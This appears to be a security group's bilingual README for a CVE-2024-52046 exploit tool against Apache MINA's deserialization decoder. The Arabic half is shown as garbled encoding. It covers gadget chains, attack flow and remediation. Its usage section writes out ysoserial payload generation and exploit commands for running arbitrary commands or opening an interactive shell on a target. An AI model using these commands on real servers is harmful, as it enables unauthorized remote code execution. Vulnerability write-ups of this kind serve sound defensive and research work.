Share
## https://sploitus.com/exploit?id=C480B1AD-8DC3-5384-9871-9CB716838996
# โโโ CVE-2024-52046 โโโ
# ๐ด AMN SECURITY ๐ด
### ู
ุฑูุฒ ุฃุจุญุงุซ ุงูุฃู
ู ุงูุณูุจุฑุงูู | Cyber Security Research Center
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
# โ ๏ธ ุซุบุฑุฉ ุฅูุบุงุก ุงูุชุณูุณู ูู Apache MINA ุชุคุฏู ุฅูู ุชูููุฐ ุฃูุงู
ุฑ ุนู ุจูุนุฏ
### CVE-2024-52046 | CVSS 9.8 | ุญุฑุฌุฉ ุฌุฏุงู (CRITICAL)
---
### ๐ ุงูู
ูุฎุต ุงูุชูููุฐู
ุซุบุฑุฉ ุฃู
ููุฉ ุฎุทูุฑุฉ ุฌุฏุงู ูู ู
ูุชุจุฉ **Apache MINA** (Multipurpose Infrastructure for Network Applications) ุชุณู
ุญ ูู
ูุงุฌู
ุบูุฑ ู
ูุตุงุฏู ุจุชูููุฐ ุฃูุงู
ุฑ ุนุดูุงุฆูุฉ ุนู ุจูุนุฏ (RCE) ุนุจุฑ ุฅุฑุณุงู ุจูุงูุงุช ู
ุชุณูุณูุฉ (Serialized Data) ู
ุตู
ู
ุฉ ุฎุตูุตุงู.
ุชูุน ุงูุซุบุฑุฉ ูู ุงูู
ููู **ObjectSerializationDecoder** ุงูุฐู ูุณุชุฎุฏู
ุจุฑูุชูููู ุฅูุบุงุก ุงูุชุณูุณู ุงูุฃุตูู ูู Java (Native Deserialization) ูู
ุนุงูุฌุฉ ุงูุจูุงูุงุช ุงููุงุฑุฏุฉุ ุฏูู ูุฌูุฏ ูุญูุตุงุช ุฃู
ููุฉ ุฃู ุถูุงุจุท ูุงููุฉ. ูุฐุง ูุณู
ุญ ุจุงุณุชุบูุงู ุณูุณูุฉ ุฅูุบุงุก ุงูุชุณูุณู ุบูุฑ ุงูุขู
ูุฉ (Unsafe Deserialization) ูุชูููุฐ ููุฏ ุถุงุฑ ุนูู ุงูุฎุงุฏู
.
| ุงูุนูุตุฑ | ุงูุชูุงุตูู |
|--------|----------|
| **CVE** | CVE-2024-52046 |
| **CVSS v3.1** | 9.8 (Critical) |
| **ุงูู
ุชุฌู** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **ุงูููุน** | Deserialization of Untrusted Data (CWE-502) |
| **ุงูู
ูุชุฌ** | Apache MINA |
| **ุงูู
ููู** | ObjectSerializationDecoder |
| **ุงูุฅุตุฏุงุฑุงุช ุงูู
ุชุฃุซุฑุฉ** | ุฌู
ูุน ุงูุฅุตุฏุงุฑุงุช ูุจู ุงูุชุตุญูุญ |
| **ุงูุชุฃุซูุฑ** | ุชูููุฐ ุฃูุงู
ุฑ ุนู ุจูุนุฏ ุบูุฑ ู
ูุตุงุฏูู |
| **ุงูุชุนููุฏ** | ู
ูุฎูุถ |
---
### ๐ ุชูุงุตูู ุงูุซุบุฑุฉ
Apache MINA ูู ุฅุทุงุฑ ุนู
ู ุดุจูู ุนุงูู ุงูุฃุฏุงุก ูุชุทููุฑ ุชุทุจููุงุช ุงูุดุจูุงุช ูู Java. ูุณุชุฎุฏู
ุนูู ูุทุงู ูุงุณุน ูู ุงูุฃูุธู
ุฉ ุงูู
ูุฒุนุฉ ูุฎูุงุฏู
ุงูุฃูุนุงุจ ูุชุทุจููุงุช IoT.
ุงูู
ููู **ObjectSerializationDecoder** ู
ุณุคูู ุนู ูู ุชุดููุฑ ุงูุจูุงูุงุช ุงูู
ุชุณูุณูุฉ ุงููุงุฑุฏุฉ ุนุจุฑ ุงูุดุจูุฉ. ุงูู
ุดููุฉ ุฃูู ูุณุชุฎุฏู
ุทุฑููุฉ `readObject()` ูู Java ู
ุจุงุดุฑุฉ ุฏูู ุฃู ุชุญูู ู
ู ุณูุงู
ุฉ ุงูุจูุงูุงุช ุฃู ุชุตููุฉ ูููุฆุงุช ุงูู
ุณู
ูุญ ุจูุง.
#### ููู ุชุนู
ู ูุฌู
ุงุช ุฅูุบุงุก ุงูุชุณูุณู ูู Javaุ
```
ุจูุงูุงุช ู
ุชุณูุณูุฉ ูุงุฑุฏุฉ (ุจุงูุช)
โ
โผ
ObjectSerializationDecoder.readObject()
โ
โผ
[ูุง ููุฌุฏ ุชุญูู ุฃู
ูู] โ ุงูุฎูู ููุง
โ
โผ
ุฅูุดุงุก ูุงุฆูุงุช Java ู
ู ุงูุจูุงูุงุช
โ
โผ
ูู
ูู ููู
ูุงุฌู
ุชุถู
ูู gadgets ุถุงุฑุฉ
โ
โผ
ุชูููุฐ ุฃูุงู
ุฑ ุงููุธุงู
โ RCE
```
#### ุณูุณูุฉ ุงูุงุณุชุบูุงู (Gadget Chain)
```
ObjectInputStream.readObject()
โ
โผ
HashMap.readObject()
โ
โผ
Runtime.exec() โ ุนุจุฑ ุณูุณูุฉ gadgets
โ
โผ
ุฃู
ุฑ ุงููุธุงู
ุงููุฏู โ ุชูููุฐ
```
#### ุงูู Gadgets ุงูุดุงุฆุนุฉ ูุงุณุชุบูุงู Java Deserialization
| ุงูู
ูุชุจุฉ | ุงูู Gadget | ุงูุญุงูุฉ |
|---------|-----------|--------|
| Commons Collections 3.1 | AnnotationInvocationHandler | โ
ุงูุฃูุซุฑ ุดููุนุงู |
| Commons Collections 4.0 | TreeBag / TreeMap | โ
ู
ุชููุฑ |
| JRE 8u20 | HashSet / Hashtable | โ
ู
ุญุฏูุฏ |
| Spring Beans | MethodInvoker | โ
ู
ุชููุฑ |
| Groovy | MethodClosure | โ
ู
ุชููุฑ |
| Jackson | ObjectMapper | โ
ู
ุน ุฅุตุฏุงุฑุงุช ู
ุญุฏุฏุฉ |
---
### ๐ฅ ุขููุฉ ุงููุฌูู
```
โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โ Attacker โ โ Target Server โ โ Vulnerable App โ
โ (Unauth) โ โ (Apache MINA) โ โ (Java Runtime) โ
โโโโโโโโโโฌโโโโโโโโโ โโโโโโโโโโฌโโโโโโโโโโ โโโโโโโโโโฌโโโโโโโโโโ
โ โ โ
โ 1. Scan for MINA โ โ
โ service on network โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 2. Send crafted โ โ
โ serialized Java โ โ
โ object payload โ โ
โโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ 3. MINA receives โ โ
โ & deserializes โโโโโโโโโโโโโโโโโโโโโโโโโโบโ
โ โ โ
โ โ 4. Gadget chain โ
โ โ activates โ
โ โ โโโบ Runtime.exec() โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ โ
โ 5. Command executed โ โ
โ on target server โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโค โ
โ โ โ
```
---
### ๐งช ุงุณุชุฎุฏุงู
ุงูุฃุฏุงุฉ
```bash
# ุฅูุดุงุก ุญู
ููุฉ ุจุงุณุชุฎุฏุงู
ysoserial
java -jar ysoserial.jar CommonsCollections3 'id > /tmp/pwned' > payload.bin
# ุงุณุชุบูุงู Apache MINA
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "id"
# ูุญุต ุงูุฎุฏู
ุฉ
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --check
# ุงุณุชุฎุฏุงู
gadget ู
ุฎุชูู
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "whoami" \
--gadget CommonsCollections6
# ุนุจุฑ ุจุฑููุณู
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "ipconfig" \
--proxy http://127.0.0.1:8080
# ูุถุน ุชูุงุนูู
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --shell
```
#### ุงูุฎูุงุฑุงุช ุงูู
ุชุงุญุฉ
| ุงูุฎูุงุฑ | ุงููุตู |
|--------|-------|
| `-t, --target` | ุนููุงู ุงูุฎุงุฏู
ุงูู
ุณุชูุฏู |
| `-p, --port` | ู
ููุฐ ุฎุฏู
ุฉ Apache MINA |
| `-c, --command` | ุงูุฃู
ุฑ ุงูู
ุฑุงุฏ ุชูููุฐู |
| `--check` | ูุญุต ูุฌูุฏ ุงูุซุบุฑุฉ ููุท |
| `--shell` | ูุถุน ุดูู ุชูุงุนูู |
| `--gadget` | ุชุญุฏูุฏ gadget chain (ุงูุชุฑุงุถู: CommonsCollections3) |
| `--proxy` | ุจุฑููุณู HTTP |
| `--ysoserial-path` | ู
ุณุงุฑ ysoserial.jar |
| `-v, --verbose` | ุฅุธูุงุฑ ุชูุงุตูู ุฅุถุงููุฉ |
---
### ๐ก๏ธ ุงูุฅุฌุฑุงุกุงุช ุงูุนูุงุฌูุฉ
| ุงูุฅุฌุฑุงุก | ุงูุฃููููุฉ | ุงููุตู |
|---------|----------|-------|
| **ุชุญุฏูุซ Apache MINA** | ๐ข ููุฑู | ุชุญุฏูุซ ุงูู
ูุชุจุฉ ุฅูู ุฃุญุฏุซ ุฅุตุฏุงุฑ |
| **ุชุนุทูู ObjectSerializationDecoder** | ๐ข ุนุงุฌู | ุงุณุชุฎุฏุงู
ุจุฏูู ุขู
ู ุฃู ุชุนุทูู Serialization |
| **ุชูุนูู Filtering** | ๐ก ู
ูู
| ุงุณุชุฎุฏุงู
JEP 290 (ObjectInputFilter) |
| **ุงุณุชุฎุฏุงู
Whitelist** | ๐ก ู
ูู
| ุชุญุฏูุฏ ุงููุฆุงุช ุงูู
ุณู
ูุญ ุจุฅูุบุงุก ุชุณูุณููุง ููุท |
| **DMZ Network** | ๐ต ู
ุณุชู
ุฑ | ูุตู ุงูุฎุฏู
ุงุช ุงูู
ุนุฑุถุฉ ุนู ุงูุดุจูุฉ ุงูุฏุงุฎููุฉ |
#### ุชุทุจูู JEP 290 (ObjectInputFilter)
```java
// ุชุทุจูู ููุชุฑ ุนูู ู
ุณุชูู JVM
ObjectInputFilter filter = ObjectInputFilter.Config
.createFilter("!com.example.*;java.base/*;!*");
ObjectInputFilter.Config.setSerialFilter(filter);
// ุฃู ุนูู ู
ุณุชูู ObjectStream
ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(filter);
```
#### ุงุณุชุฎุฏุงู
Whitelist ุขู
ู
```java
// ุจุฏูู ุขู
ู ูู ObjectSerializationDecoder
// ุงุณุชุฎุฏุงู
JSON/YAML ุจุฏูุงู ู
ู Java Serialization
ObjectMapper mapper = new ObjectMapper();
MyObject obj = mapper.readValue(jsonInput, MyObject.class);
```
---
### ๐ ุงูุชุฃุซูุฑ ุนูู ุงูุฃูุธู
ุฉ ุงูู
ุฎุชููุฉ
| ููุน ุงููุธุงู
| ู
ุณุชูู ุงูุชุฃุซูุฑ | ุงูุดุฑุญ |
|-----------|---------------|-------|
| ุฎูุงุฏู
ุงูุฃูุนุงุจ | ๐ด ุนุงูู | Apache MINA ุดุงุฆุน ูู ุฎูุงุฏู
ุงูุฃูุนุงุจ Massive Multiplayer |
| ุชุทุจููุงุช IoT | ๐ด ุนุงูู | ูุณุชุฎุฏู
ูู ุฃูุธู
ุฉ ุฅูุชุฑูุช ุงูุฃุดูุงุก ูุงูุงุชุตุงูุงุช ู
ูุฎูุถุฉ ุงูุชุฃุฎูุฑ |
| ุงูุฃูุธู
ุฉ ุงูู
ุงููุฉ | ๐ด ุนุงูู | ุฃูุธู
ุฉ ุงูุชุฏุงูู ุนุงููุฉ ุงูุชุฑุฏุฏ ุชุณุชุฎุฏู
MINA |
| ุชุทุจููุงุช ุงูุฏุฑุฏุดุฉ | ๐ก ู
ุชูุณุท | ุฎูุงุฏู
ุงูุฏุฑุฏุดุฉ ุงูู
ุจุงุดุฑุฉ |
| ุงูุชุทุจููุงุช ุงูู
ุฎุตุตุฉ | ๐ก ู
ุชูุณุท | ุฃู ุชุทุจูู Java ูุณุชุฎุฏู
MINA ููุงุชุตุงูุงุช ุงูุดุจููุฉ |
---
### ๐ ุงูู
ุฑุงุฌุน
- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2024-52046
- **Apache Advisory**: https://lists.apache.org/thread/CVE-2024-52046
- **CWE-502**: https://cwe.mitre.org/data/definitions/502.html
- **ysoserial**: https://github.com/frohoff/ysoserial
- **JEP 290**: https://openjdk.org/jeps/290
> โ ๏ธ **ุฅุฎูุงุก ู
ุณุคูููุฉ**: ูุฐุง ุงูุชูุฑูุฑ ูุฃุบุฑุงุถ ุชุนููู
ูุฉ ูุจุญุซูุฉ ููุท. ุงุณุชุฎุฏุงู
ูุฐู ุงูู
ุนููู
ุงุช ูุฃุบุฑุงุถ ุบูุฑ ูุงููููุฉ ูุชุญู
ู ุงูู
ุณุชุฎุฏู
ู
ุณุคูููุชู ุจุงููุงู
ู.
---
### ๐ ุชูุงุตู ู
ุน AMN SECURITY
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
# โ ๏ธ CVE-2024-52046 โ Apache MINA Deserialization Remote Code Execution
### CVSS 9.8 | CRITICAL | Unauthenticated Remote Code Execution
---
### Executive Summary
**CVE-2024-52046** is a critical unauthenticated Remote Code Execution vulnerability in the **Apache MINA** framework. The **ObjectSerializationDecoder** component uses Java's native deserialization protocol to process incoming serialized data without adequate security checks, allowing attackers to exploit the deserialization process by sending specially crafted malicious serialized objects.
Apache MINA is a high-performance network application framework used extensively in distributed systems, gaming servers, IoT applications, and financial trading platforms.
| Field | Value |
|-------|-------|
| **CVE** | CVE-2024-52046 |
| **CVSS v3.1** | 9.8 (Critical) |
| **Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Type** | Deserialization of Untrusted Data (CWE-502) |
| **Product** | Apache MINA |
| **Component** | ObjectSerializationDecoder |
| **Impact** | Unauthenticated Remote Code Execution |
---
### Vulnerability Details
The `ObjectSerializationDecoder` in Apache MINA directly calls Java's `readObject()` method without validating the incoming data stream. An attacker can craft a serialized Java object containing a gadget chain that executes arbitrary system commands upon deserialization.
#### Common Gadget Chains
| Library | Gadget | Status |
|---------|--------|--------|
| Commons Collections 3.1 | AnnotationInvocationHandler | โ
Most common |
| Commons Collections 4.0 | TreeBag / TreeMap | โ
Available |
| JRE 8u20 | HashSet / Hashtable | โ
Limited |
| Spring Beans | MethodInvoker | โ
Available |
| Groovy | MethodClosure | โ
Available |
### Tool Usage
```bash
# Generate payload with ysoserial
java -jar ysoserial.jar CommonsCollections3 'id > /tmp/pwned' > payload.bin
# Exploit Apache MINA
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "id"
# Check for vulnerability
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --check
# Use different gadget
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 -c "whoami" \
--gadget CommonsCollections6
# Interactive shell
python3 CVE-2024-52046.py -t 192.168.1.100 -p 8080 --shell
```
### Remediation
| Action | Priority | Description |
|--------|----------|-------------|
| **Update MINA** | ๐ด Immediate | Update to latest patched version |
| **Disable Decoder** | ๐ด Urgent | Switch to alternative safe decoder |
| **Enable Filtering** | ๐ก Important | Implement JEP 290 ObjectInputFilter |
| **Use Whitelist** | ๐ก Important | Allow only trusted classes |
#### JEP 290 Implementation
```java
ObjectInputFilter filter = ObjectInputFilter.Config
.createFilter("!com.example.*;java.base/*;!*");
ObjectInputFilter.Config.setSerialFilter(filter);
```
### Impact by System Type
| System Type | Impact Level | Description |
|------------|-------------|-------------|
| Game Servers | ๐ด Critical | MINA is common in MMO game servers |
| IoT Systems | ๐ด Critical | Low-latency IoT communication |
| Financial Systems | ๐ด Critical | High-frequency trading platforms |
| Chat Applications | ๐ก Medium | Real-time messaging servers |
### References
- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2024-52046
- **CWE-502**: https://cwe.mitre.org/data/definitions/502.html
- **ysoserial**: https://github.com/frohoff/ysoserial
- **JEP 290**: https://openjdk.org/jeps/290
---
### Connect with AMN SECURITY
๐ **Website**: https://amn.amnoffsec.workers.dev/
๐ธ **Instagram**: https://www.instagram.com/ixctw
๐ง **Email**: ayman.mahmoudoffsec@gmail.com
---
> โ ๏ธ **Disclaimer**: This report is for educational and research purposes only. Unauthorized use of this information is illegal and the user bears full responsibility.